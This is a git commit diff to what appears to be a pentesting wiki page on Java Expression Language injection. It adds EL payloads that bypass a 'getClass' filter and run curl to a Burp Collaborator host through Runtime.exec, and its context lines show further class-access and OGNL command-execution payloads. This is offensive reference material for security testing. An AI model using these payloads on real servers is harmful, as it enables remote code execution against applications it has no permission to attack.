GitBook: [#2794] sdf
This commit is contained in:
parent
febd64a6ca
commit
c8efcbe5f6
|
@ -1,5 +1,11 @@
|
|||
# EL - Expression Language
|
||||
|
||||
##
|
||||
|
||||
##
|
||||
|
||||
##
|
||||
|
||||
## Basic Information
|
||||
|
||||
EL provides an important mechanism for enabling the presentation layer (web pages) to communicate with the application logic (managed beans).
|
||||
|
@ -101,6 +107,9 @@ Result of executing it:
|
|||
{"".getClass()}
|
||||
[class java.lang.String]
|
||||
|
||||
#Access ro the String class bypassing "getClass"
|
||||
#{""["class"]}
|
||||
|
||||
#Access to arbitrary class
|
||||
{"".getClass().forName("java.util.Date")}
|
||||
[class java.util.Date]
|
||||
|
@ -157,6 +166,9 @@ https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlCo
|
|||
#Execute command (you won't see the command output in the console)
|
||||
{"".getClass().forName("java.lang.Runtime").getRuntime().exec("curl http://127.0.0.1:8000")}
|
||||
[Process[pid=10892, exitValue=0]]
|
||||
|
||||
#Execute command bypassing "getClass"
|
||||
#{""["class"].forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("curl <instance>.burpcollaborator.net")}
|
||||
```
|
||||
|
||||
* RCE **linux**
|
||||
|
|
Loading…
Reference in New Issue